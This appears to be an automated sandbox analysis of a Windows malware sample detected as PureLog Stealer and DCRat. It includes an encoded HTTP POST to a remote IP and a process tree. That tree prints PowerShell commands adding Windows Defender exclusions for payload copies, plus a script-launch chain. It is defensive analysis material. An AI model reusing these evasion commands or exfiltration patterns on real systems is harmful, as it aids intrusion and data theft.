                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:59:15.094574928 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:59:15.439156055 CET2544OUTData Raw: 5c 54 43 50 5e 57 56 51 58 5b 57 56 50 53 5b 56 55 50 5e 5f 54 5b 51 5b 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \TCP^WVQX[WVPS[VUP^_T[Q[RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'@,Y(?P8/&+>8^+^ #'?+(=6&;&:'_!/Y.
                                                                                                Jan 10, 2025 07:59:15.958376884 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:59:16.088973045 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:59:15 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Statistics

                                                                                                CPU Usage

                                                                                                Click to jump to process

                                                                                                Memory Usage

                                                                                                Click to jump to process

                                                                                                High Level Behavior Distribution

                                                                                                Click to dive into process behavior distribution

                                                                                                Behavior

                                                                                                Click to jump to process

                                                                                                System Behavior

                                                                                                General

                                                                                                Target ID:0
                                                                                                Start time:01:56:58
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Users\user\Desktop\hz7DzW2Yop.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\hz7DzW2Yop.exe"
                                                                                                Imagebase:0x900000
                                                                                                File size:2'926'873 bytes
                                                                                                MD5 hash:46DCDDD43CBAEAE845C14E7306726FF2
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1669057871.000000000620B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1669587198.0000000006A09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:1
                                                                                                Start time:01:56:59
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\HyperWebbroker\kC1qNwulObrDTKeFv7nRu.vbe"
                                                                                                Imagebase:0xf00000
                                                                                                File size:147'456 bytes
                                                                                                MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:2
                                                                                                Start time:01:57:14
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\HyperWebbroker\lGnbJpj21JH90uguTRu2sUXatfulFm1f34jhZ8QO993nz73C1NZz.bat" "
                                                                                                Imagebase:0x240000
                                                                                                File size:236'544 bytes
                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:3
                                                                                                Start time:01:57:14
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:5
                                                                                                Start time:01:57:15
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\HyperWebbroker/serverBrokerperfMonitor.exe"
                                                                                                Imagebase:0xfe0000
                                                                                                File size:2'639'872 bytes
                                                                                                MD5 hash:C1CF39EF49B82B35938CA7A45DBCCEEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.1930693014.00000000137F7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000000.1829997271.0000000000FE2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe, Author: Joe Security
                                                                                                Antivirus matches:
                                                                                                • Detection: 100%, Avira
                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                • Detection: 68%, ReversingLabs
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:21
                                                                                                Start time:01:57:19
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe'
                                                                                                Imagebase:0x7ff788560000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:22
                                                                                                Start time:01:57:19
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\uAsLgsGzSk.exe'
                                                                                                Imagebase:0x7ff788560000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:23
                                                                                                Start time:01:57:19
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:24
                                                                                                Start time:01:57:19
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ShellExperiences\uAsLgsGzSk.exe'
                                                                                                Imagebase:0x7ff788560000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:25
                                                                                                Start time:01:57:19
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:26
                                                                                                Start time:01:57:19
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SystemSettings.exe'
                                                                                                Imagebase:0x7ff788560000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:27
                                                                                                Start time:01:57:19
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:28
                                                                                                Start time:01:57:19
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\uAsLgsGzSk.exe'
                                                                                                Imagebase:0x7ff788560000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:29
                                                                                                Start time:01:57:19
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:30
                                                                                                Start time:01:57:19
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:32
                                                                                                Start time:01:57:21
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2K3wfCcSpW.bat"
                                                                                                Imagebase:0x7ff6d03a0000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:33
                                                                                                Start time:01:57:21
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:35
                                                                                                Start time:01:57:21
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Recovery\uAsLgsGzSk.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Recovery\uAsLgsGzSk.exe
                                                                                                Imagebase:0x500000
                                                                                                File size:2'639'872 bytes
                                                                                                MD5 hash:C1CF39EF49B82B35938CA7A45DBCCEEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Antivirus matches:
                                                                                                • Detection: 68%, ReversingLabs
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:36
                                                                                                Start time:01:57:21
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\chcp.com
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:chcp 65001
                                                                                                Imagebase:0x7ff6fb1e0000
                                                                                                File size:14'848 bytes
                                                                                                MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:37
                                                                                                Start time:01:57:21
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Recovery\uAsLgsGzSk.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Recovery\uAsLgsGzSk.exe
                                                                                                Imagebase:0xd10000
                                                                                                File size:2'639'872 bytes
                                                                                                MD5 hash:C1CF39EF49B82B35938CA7A45DBCCEEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:38
                                                                                                Start time:01:57:21
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\w32tm.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                Imagebase:0x7ff64bd10000
                                                                                                File size:108'032 bytes
                                                                                                MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:41
                                                                                                Start time:01:57:26
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                Imagebase:0x7ff693ab0000
                                                                                                File size:496'640 bytes
                                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:42
                                                                                                Start time:01:57:27
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\ShellExperiences\uAsLgsGzSk.exe"
                                                                                                Imagebase:0xbc0000
                                                                                                File size:2'639'872 bytes
                                                                                                MD5 hash:C1CF39EF49B82B35938CA7A45DBCCEEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Antivirus matches:
                                                                                                • Detection: 68%, ReversingLabs
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:44
                                                                                                Start time:01:57:31
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                Imagebase:0x7ff6eef20000
                                                                                                File size:55'320 bytes
                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                Disassembly

                                                                                                Reset < >

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:9.6%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:9.3%
                                                                                                  Total number of Nodes:1512
                                                                                                  Total number of Limit Nodes:28
                                                                                                  execution_graph 25382 92b49d 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25417 919580 6 API calls 25443 91c793 102 API calls 4 library calls 25384 91c793 97 API calls 4 library calls 25419 91b18d 78 API calls 23449 91e5b1 23450 91e578 23449->23450 23452 91e85d 23450->23452 23478 91e5bb 23452->23478 23454 91e86d 23455 91e8ca 23454->23455 23466 91e8ee 23454->23466 23456 91e7fb DloadReleaseSectionWriteAccess 6 API calls 23455->23456 23457 91e8d5 RaiseException 23456->23457 23458 91eac3 23457->23458 23458->23450 23459 91e9d9 23465 91ea37 GetProcAddress 23459->23465 23472 91ea95 23459->23472 23460 91e966 LoadLibraryExA 23461 91e9c7 23460->23461 23462 91e979 GetLastError 23460->23462 23461->23459 23463 91e9d2 FreeLibrary 23461->23463 23464 91e9a2 23462->23464 23474 91e98c 23462->23474 23463->23459 23468 91e7fb DloadReleaseSectionWriteAccess 6 API calls 23464->23468 23467 91ea47 GetLastError 23465->23467 23465->23472 23466->23459 23466->23460 23466->23461 23466->23472 23476 91ea5a 23467->23476 23470 91e9ad RaiseException 23468->23470 23470->23458 23471 91e7fb DloadReleaseSectionWriteAccess 6 API calls 23473 91ea7b RaiseException 23471->23473 23487 91e7fb 23472->23487 23475 91e5bb ___delayLoadHelper2@8 6 API calls 23473->23475 23474->23461 23474->23464 23477 91ea92 23475->23477 23476->23471 23476->23472 23477->23472 23479 91e5c7 23478->23479 23480 91e5ed 23478->23480 23495 91e664 23479->23495 23480->23454 23482 91e5cc 23484 91e5e8 23482->23484 23498 91e78d 23482->23498 23503 91e5ee GetModuleHandleW GetProcAddress GetProcAddress 23484->23503 23486 91e836 23486->23454 23488 91e80d 23487->23488 23489 91e82f 23487->23489 23490 91e664 DloadReleaseSectionWriteAccess 3 API calls 23488->23490 23489->23458 23491 91e812 23490->23491 23492 91e82a 23491->23492 23493 91e78d DloadProtectSection 3 API calls 23491->23493 23506 91e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23492->23506 23493->23492 23504 91e5ee GetModuleHandleW GetProcAddress GetProcAddress 23495->23504 23497 91e669 23497->23482 23499 91e7a2 DloadProtectSection 23498->23499 23500 91e7dd VirtualProtect 23499->23500 23501 91e7a8 23499->23501 23505 91e6a3 VirtualQuery GetSystemInfo 23499->23505 23500->23501 23501->23484 23503->23486 23504->23497 23505->23500 23506->23489 25420 91b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 23715 91f3b2 23716 91f3be ___scrt_is_nonwritable_in_current_image 23715->23716 23747 91eed7 23716->23747 23718 91f3c5 23719 91f518 23718->23719 23722 91f3ef 23718->23722 23820 91f838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 23719->23820 23721 91f51f 23813 927f58 23721->23813 23725 91f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23722->23725 23758 928aed 23722->23758 23732 91f48f 23725->23732 23816 927af4 38 API calls _abort 23725->23816 23730 91f40e 23766 91f953 GetStartupInfoW _abort 23732->23766 23734 91f495 23767 928a3e 51 API calls 23734->23767 23736 91f49d 23768 91df1e 23736->23768 23741 91f4b1 23741->23721 23742 91f4b5 23741->23742 23743 91f4be 23742->23743 23818 927efb 28 API calls _abort 23742->23818 23819 91f048 12 API calls ___scrt_uninitialize_crt 23743->23819 23746 91f4c6 23746->23730 23748 91eee0 23747->23748 23822 91f654 IsProcessorFeaturePresent 23748->23822 23750 91eeec 23823 922a5e 23750->23823 23752 91eef1 23757 91eef5 23752->23757 23831 928977 23752->23831 23755 91ef0c 23755->23718 23757->23718 23759 928b04 23758->23759 23760 91fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23759->23760 23761 91f408 23760->23761 23761->23730 23762 928a91 23761->23762 23763 928ac0 23762->23763 23764 91fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23763->23764 23765 928ae9 23764->23765 23765->23725 23766->23734 23767->23736 23931 910863 23768->23931 23772 91df3d 23980 91ac16 23772->23980 23774 91df46 _abort 23775 91df59 GetCommandLineW 23774->23775 23776 91dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23775->23776 23777 91df68 23775->23777 23995 904092 23776->23995 23984 91c5c4 23777->23984 23782 91dfe0 23989 91dbde 23782->23989 23783 91df76 OpenFileMappingW 23785 91dfd6 CloseHandle 23783->23785 23786 91df8f MapViewOfFile 23783->23786 23785->23776 23790 91dfcd UnmapViewOfFile 23786->23790 23792 91dfa0 __InternalCxxFrameHandler 23786->23792 23790->23785 23795 91dbde 2 API calls 23792->23795 23797 91dfbc 23795->23797 23796 9190b7 8 API calls 23798 91e0aa DialogBoxParamW 23796->23798 23797->23790 23799 91e0e4 23798->23799 23800 91e0f6 Sleep 23799->23800 23801 91e0fd 23799->23801 23800->23801 23804 91e10b 23801->23804 24028 91ae2f CompareStringW SetCurrentDirectoryW _abort _wcslen 23801->24028 23803 91e12a DeleteObject 23805 91e146 23803->23805 23806 91e13f DeleteObject 23803->23806 23804->23803 23807 91e177 23805->23807 23808 91e189 23805->23808 23806->23805 24029 91dc3b 6 API calls 23807->24029 24025 91ac7c 23808->24025 23811 91e17d CloseHandle 23811->23808 23812 91e1c3 23817 91f993 GetModuleHandleW 23812->23817 24280 927cd5 23813->24280 23816->23732 23817->23741 23818->23743 23819->23746 23820->23721 23822->23750 23835 923b07 23823->23835 23827 922a6f 23828 922a7a 23827->23828 23849 923b43 DeleteCriticalSection 23827->23849 23828->23752 23830 922a67 23830->23752 23878 92c05a 23831->23878 23834 922a7d 7 API calls 2 library calls 23834->23757 23836 923b10 23835->23836 23838 923b39 23836->23838 23839 922a63 23836->23839 23850 923d46 23836->23850 23855 923b43 DeleteCriticalSection 23838->23855 23839->23830 23841 922b8c 23839->23841 23871 923c57 23841->23871 23844 922ba1 23844->23827 23846 922baf 23847 922bbc 23846->23847 23877 922bbf 6 API calls ___vcrt_FlsFree 23846->23877 23847->23827 23849->23830 23856 923c0d 23850->23856 23853 923d7e InitializeCriticalSectionAndSpinCount 23854 923d69 23853->23854 23854->23836 23855->23839 23857 923c4f 23856->23857 23858 923c26 23856->23858 23857->23853 23857->23854 23858->23857 23863 923b72 23858->23863 23861 923c3b GetProcAddress 23861->23857 23862 923c49 23861->23862 23862->23857 23868 923b7e ___vcrt_FlsGetValue 23863->23868 23864 923bf3 23864->23857 23864->23861 23865 923b95 LoadLibraryExW 23866 923bb3 GetLastError 23865->23866 23867 923bfa 23865->23867 23866->23868 23867->23864 23869 923c02 FreeLibrary 23867->23869 23868->23864 23868->23865 23870 923bd5 LoadLibraryExW 23868->23870 23869->23864 23870->23867 23870->23868 23872 923c0d ___vcrt_FlsGetValue 5 API calls 23871->23872 23873 923c71 23872->23873 23874 923c8a TlsAlloc 23873->23874 23875 922b96 23873->23875 23875->23844 23876 923d08 6 API calls ___vcrt_FlsGetValue 23875->23876 23876->23846 23877->23844 23879 92c077 23878->23879 23882 92c073 23878->23882 23879->23882 23884 92a6a0 23879->23884 23880 91fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23881 91eefe 23880->23881 23881->23755 23881->23834 23882->23880 23885 92a6ac ___scrt_is_nonwritable_in_current_image 23884->23885 23896 92ac31 EnterCriticalSection 23885->23896 23887 92a6b3 23897 92c528 23887->23897 23889 92a6c2 23895 92a6d1 23889->23895 23910 92a529 29 API calls 23889->23910 23892 92a6cc 23911 92a5df GetStdHandle GetFileType 23892->23911 23893 92a6e2 _abort 23893->23879 23912 92a6ed LeaveCriticalSection _abort 23895->23912 23896->23887 23898 92c534 ___scrt_is_nonwritable_in_current_image 23897->23898 23899 92c541 23898->23899 23900 92c558 23898->23900 23921 9291a8 20 API calls _abort 23899->23921 23913 92ac31 EnterCriticalSection 23900->23913 23903 92c546 23922 929087 26 API calls _abort 23903->23922 23905 92c590 23923 92c5b7 LeaveCriticalSection _abort 23905->23923 23906 92c550 _abort 23906->23889 23907 92c564 23907->23905 23914 92c479 23907->23914 23910->23892 23911->23895 23912->23893 23913->23907 23915 92b136 _abort 20 API calls 23914->23915 23916 92c48b 23915->23916 23920 92c498 23916->23920 23924 92af0a 23916->23924 23917 928dcc _free 20 API calls 23919 92c4ea 23917->23919 23919->23907 23920->23917 23921->23903 23922->23906 23923->23906 23925 92ac98 _abort 5 API calls 23924->23925 23926 92af31 23925->23926 23927 92af4f InitializeCriticalSectionAndSpinCount 23926->23927 23928 92af3a 23926->23928 23927->23928 23929 91fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23928->23929 23930 92af66 23929->23930 23930->23916 24030 91ec50 23931->24030 23934 9108e7 23936 910c14 GetModuleFileNameW 23934->23936 24041 9275fb 42 API calls 2 library calls 23934->24041 23935 910888 GetProcAddress 23937 9108a1 23935->23937 23938 9108b9 GetProcAddress 23935->23938 23947 910c32 23936->23947 23937->23938 23940 9108cb 23938->23940 23940->23934 23941 910b54 23941->23936 23942 910b5f GetModuleFileNameW CreateFileW 23941->23942 23943 910c08 CloseHandle 23942->23943 23944 910b8f SetFilePointer 23942->23944 23943->23936 23944->23943 23945 910b9d ReadFile 23944->23945 23945->23943 23948 910bbb 23945->23948 23950 910c94 GetFileAttributesW 23947->23950 23951 910cac 23947->23951 23953 910c5d CompareStringW 23947->23953 24032 90b146 23947->24032 24035 91081b 23947->24035 23948->23943 23952 91081b 2 API calls 23948->23952 23950->23947 23950->23951 23954 910cb7 23951->23954 23956 910cec 23951->23956 23952->23948 23953->23947 23957 910cd0 GetFileAttributesW 23954->23957 23959 910ce8 23954->23959 23955 910dfb 23979 91a64d GetCurrentDirectoryW 23955->23979 23956->23955 23958 90b146 GetVersionExW 23956->23958 23957->23954 23957->23959 23960 910d06 23958->23960 23959->23956 23961 910d73 23960->23961 23962 910d0d 23960->23962 23963 904092 _swprintf 51 API calls 23961->23963 23964 91081b 2 API calls 23962->23964 23965 910d9b AllocConsole 23963->23965 23966 910d17 23964->23966 23967 910df3 ExitProcess 23965->23967 23968 910da8 GetCurrentProcessId AttachConsole 23965->23968 23969 91081b 2 API calls 23966->23969 24046 923e13 23968->24046 23971 910d21 23969->23971 24042 90e617 23971->24042 23972 910dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 23972->23967 23975 904092 _swprintf 51 API calls 23976 910d4f 23975->23976 23977 